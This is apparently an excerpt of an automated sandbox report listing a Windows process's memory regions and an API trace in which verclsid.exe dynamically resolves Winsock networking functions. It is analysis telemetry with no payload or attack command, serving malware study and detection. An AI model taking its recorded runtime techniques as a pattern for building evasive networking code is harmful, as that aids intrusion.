filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 4382
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4383
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4384
start_va = 0x1c80000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 4385
start_va = 0x1e30000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 4386
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4387
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4388
start_va = 0x7feffda0000
end_va = 0x7fefff17fff
monitored = 0
entry_point = 0x7feffda10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4389
start_va = 0x7fefdf70000
end_va = 0x7fefe099fff
monitored = 0
entry_point = 0x7fefdf710d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4391
start_va = 0x7fefe290000
end_va = 0x7fefe4e8fff
monitored = 0
entry_point = 0x7fefe291340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4392
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4393
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4394
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4395
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4397
start_va = 0x1f70000
end_va = 0x223efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4398
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000280000"
filename = ""
Region:
id = 4399
start_va = 0x7fefc530000
end_va = 0x7fefc65bfff
monitored = 0
entry_point = 0x7fefc5394bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 4402
start_va = 0x290000
end_va = 0x291fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 4403
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4404
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4405
start_va = 0x1c80000
end_va = 0x1c81fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c80000"
filename = ""
Region:
id = 4406
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 4536
start_va = 0x7fef5d80000
end_va = 0x7fef6936fff
monitored = 0
entry_point = 0x7fef5d81bd8
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 4537
start_va = 0x77e00000
end_va = 0x77e06fff
monitored = 0
entry_point = 0x77e0106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 4538
start_va = 0x7fef5d20000
end_va = 0x7fef5d73fff
monitored = 0
entry_point = 0x7fef5d2104c
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4539
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4540
start_va = 0x1c90000
end_va = 0x1c91fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c90000"
filename = ""
Region:
id = 4541
start_va = 0x2360000
end_va = 0x23dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 4542
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 4543
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4544
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4545
start_va = 0x7feff990000
end_va = 0x7feffb66fff
monitored = 0
entry_point = 0x7feff991010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 4546
start_va = 0x7fefdda0000
end_va = 0x7fefddd5fff
monitored = 0
entry_point = 0x7fefdda1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 4547
start_va = 0x7fefdcd0000
end_va = 0x7fefdce9fff
monitored = 0
entry_point = 0x7fefdcd1558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 4548
start_va = 0x1ca0000
end_va = 0x1cacfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 4549
start_va = 0x1cb0000
end_va = 0x1cb3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.1.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db")
Region:
id = 4550
start_va = 0x2480000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 4551
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 4552
start_va = 0x1cc0000
end_va = 0x1ce7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 4553
start_va = 0x1cf0000
end_va = 0x1cf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cf0000"
filename = ""
Region:
id = 4554
start_va = 0x2240000
end_va = 0x2340fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 4555
start_va = 0x2240000
end_va = 0x2340fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 4556
start_va = 0x2240000
end_va = 0x2340fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 4557
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4558
start_va = 0x1cb0000
end_va = 0x1cb3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4559
start_va = 0x1d00000
end_va = 0x1d2ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 4560
start_va = 0x1d30000
end_va = 0x1d33fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 4561
start_va = 0x1d40000
end_va = 0x1da5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 4562
start_va = 0x2240000
end_va = 0x224dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 4564
start_va = 0x2530000
end_va = 0x25affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 4565
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4567
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4568
start_va = 0x2250000
end_va = 0x2250fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002250000"
filename = ""
Thread:
id = 174
os_tid = 0x55c
[0511.090] GetCurrentThreadId () returned 0x55c
[0511.090] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x2d7870
[0511.091] SetThreadLocale (Locale=0x400) returned 1
[0511.093] GetVersion () returned 0x1db10106
[0511.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0511.093] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadPreferredUILanguages") returned 0x77b14fd0
[0511.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0511.094] GetProcAddress (hModule=0x77b10000, lpProcName="SetThreadPreferredUILanguages") returned 0x77b13d40
[0511.094] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77b10000
[0511.094] GetProcAddress (hModule=0x77b10000, lpProcName="GetThreadUILanguage") returned 0x77b5bba0
[0511.094] GetSystemInfo (in: lpSystemInfo=0xed980 | out: lpSystemInfo=0xed980*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0511.094] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0511.094] GetStartupInfoW (in: lpStartupInfo=0xed948 | out: lpStartupInfo=0xed948*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xf, hStdOutput=0x21d800000004, hStdError=0x6a06000600010000))
[0511.094] GetACP () returned 0x4e4
[0511.094] GetCurrentThreadId () returned 0x55c
[0511.094] GetVersion () returned 0x1db10106
[0511.095] GetVersionExW (in: lpVersionInformation=0xed89c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0xfdd3bf92, dwPlatformId=0x7fe, szCSDVersion="\峙砀 攀∀) | out: lpVersionInformation=0xed89c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0511.095] LoadLibraryW (lpLibFileName="wsock32.dll") returned 0x7fefc970000
[0521.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.106] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1e30000
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="closesocket", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="closesocket", lpUsedDefaultChar=0x0) returned 11
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="closesocket") returned 0x7feffcd18e0
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="select", cchWideChar=6, lpMultiByteStr=0x1f68d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="select", lpUsedDefaultChar=0x0) returned 6
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="select") returned 0x7feffcd4da0
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recvfrom", cchWideChar=8, lpMultiByteStr=0x1f68d00, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recvfrom", lpUsedDefaultChar=0x0) returned 8
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="recvfrom") returned 0x7fefc9717ac
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="sendto", cchWideChar=6, lpMultiByteStr=0x1f68d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sendto", lpUsedDefaultChar=0x0) returned 6
[0521.107] GetProcAddress (hModule=0x7fefc970000, lpProcName="sendto") returned 0x7feffcdd7f0
[0521.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_addr", cchWideChar=9, lpMultiByteStr=0x1f68d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_addr", lpUsedDefaultChar=0x0) returned 9
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="inet_addr") returned 0x7feffcd1350
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="htons", cchWideChar=5, lpMultiByteStr=0x1f68d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="htons", lpUsedDefaultChar=0x0) returned 5
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="htons") returned 0x7feffcd1250
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="setsockopt", cchWideChar=10, lpMultiByteStr=0x1f68d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="setsockopt", lpUsedDefaultChar=0x0) returned 10
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="setsockopt") returned 0x7fefc971664
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1f68d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="WSAStartup") returned 0x7feffcd4980
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0521.108] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1f68d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0521.108] GetProcAddress (hModule=0x7fefc970000, lpProcName="socket") returned 0x7feffcdde90
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1f68d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="WSACleanup") returned 0x7feffcd4cc0
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1f68d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="gethostbyname") returned 0x7feffcd8df0
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1f68d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="send") returned 0x7feffcd8000
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1f68d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0521.109] GetProcAddress (hModule=0x7fefc970000, lpProcName="connect") returned 0x7feffcd45c0
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0521.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1f68d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="recv") returned 0x7fefc971744
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1f68d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="gethostname") returned 0x7feffcdae20
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1f68d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="inet_ntoa") returned 0x7feffcdd9a0
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1f68d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="ntohs") returned 0x7feffcd1250
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1f68d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0521.110] GetProcAddress (hModule=0x7fefc970000, lpProcName="WSAGetLastError") returned 0x7feffcd1290
[0521.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
